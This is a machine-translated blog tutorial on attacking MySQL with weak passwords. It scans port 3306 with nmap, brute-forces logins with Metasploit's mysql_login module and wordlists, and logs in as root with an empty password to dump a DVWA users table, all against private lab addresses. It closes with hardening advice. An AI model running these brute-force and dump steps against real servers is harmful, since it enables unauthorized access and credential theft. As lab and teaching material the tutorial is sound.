当前位置:网站首页>6-21 vulnerability exploitation MySQL weak password cracking
6-21 vulnerability exploitation MySQL weak password cracking
2022-07-29 02:44:00 【Mountain Rabbit 1】

mysql Introduce
Mysql Is a relational database management system , The Swedish MySQL AB Companies to develop , At present belongs to the Oracle Its products .Mysql Is one of the most popular relational database management systems , stay WEB Application aspect ,mysql It's the best RDBMS(Relational Database Management System, Relational database management system ) Application software .
Each paragraph is stored in a table , The corresponding combination of multiple tables , Store the corresponding data , Internal key 、 Foreign keys 、 Unique index , Different values , There are corresponding connections , This is the outline of our relational database
Mysql Is a relational database management system , Relational databases keep data in different tables , Instead of storing all the data in a big warehouse , Non relational database ,mydbs、mongdb, Store data in large memory , Instead of storing it in a large table , They have no concept of table , Store in table , Is to improve the speed of search , And it has more flexibility
We can do it in mysql Official website , see mysql Information about :https://www.mysql.com/
Target detection mysql
Use nmap -sV -p 3306 IP Address , Default mysql Is running on the 3306 Of , Target detection mysql Version information .

nmap -sV -p 3306 192.168.42.137

msf Crack mysql password
Use msf Under the mysql_login Module cracking mysql Login username and password

msfconsole
use auxiliary/scanner/mysql/mysql_login
show options

set rhosts 192.168.1.105
show options

set user_file /home/kali/Desktop/user.txt
set pass_file /home/kali/Desktop/PASS.txt

show options
run

When we get it mysql After the user name and password , We can log in to mysql client , To view the database , Stored data
Log in to the database to view the data
Use mysql -h IP Address -u root Log in to the database system
mysql -h 192.168.1.105 -u root
show databases;

use dvwa;
show tables;
select * from users;

The above is the user name we cracked , Log in to the database , View the data
The reason why we can crack successfully , Because our database user name is too simple , User name used root This user , And the password is empty , Or other simple passwords , Are easy to crack , This is the time , We need to defend against such detection , You need to change the user name and password , The design is complicated , Make it not so easy to crack , And you can design thresholds , When we log in three times by mistake , Will block the corresponding IP, Limit login to ten minutes , In this way, it can't be cracked very quickly , It can't even be cracked , We can modify it mysql Default port ,3306, Design it into other ports , Confuse our detection , meanwhile , We don't allow mysql Outreach , Only through 127.0.0.1 Make local connections , Otherwise, do not connect , Or specify specific IP Address , Connect , Not arbitrary IP Can be connected to mysql On
边栏推荐
- 主从复制及其原理
- 代码随想录笔记_哈希_349两个数的交集
- Split, an avalanche caused by connection pool parameters
- Shell 脚本 快速入门 -01
- 别人的快乐
- Code implementation - the greatest common factor of polynomials (linear algebra)
- VR safety training of mine mining virtual reality improves employees' vigilance and protection awareness
- HTTP缓存
- Cuda-npp image and video processing
- Workflow of wireless vibrating wire acquisition system
猜你喜欢

2022/07/28 学习笔记 (day18) 常用API

How to migrate thinkphp5 projects to Alibaba cloud function computing to cope with traffic peaks?

Read the recent trends of okaleido tiger and tap the value and potential behind it

Redis master-slave mode, sentinel cluster, fragment cluster

HTTP cache

I want to talk about high concurrency.

JMeter's BeanShell generates MD5 encrypted data and writes it to the database

How awesome is the architecture of "12306"?

ECCV 2022 | airdet: a small sample target detection method without fine tuning

ROCBOSS开源微社区轻论坛类源码
随机推荐
NVIDIA-VPI(Vision Programming Interface)
Shell script quick start-01
laravel框架中实现封装公共方法全局调用
Driverless obstacle avoidance technology
How does the Devops team defend against API attacks?
Polygon point test
Understand the evolution of redis architecture in one article
Why is redis fast? Message queue, single thread
Tesla neural network model hydranet
Redis queue realizes second kill
6-21漏洞利用-mysql弱口令破解
Others' happiness
童年的快乐时光
Ten methods to prevent blackmail software from attacking data
深度剖析 —— 预处理
Branch management practice of "two pizza" team
[error reporting] node:internal/modules/cjs/loader:936 [solution]
Qt编写物联网管理平台48-特色功能设计
Cuda-npp image and video processing
where、having、group by、order by,is null,not in,子查询,delete,日期函数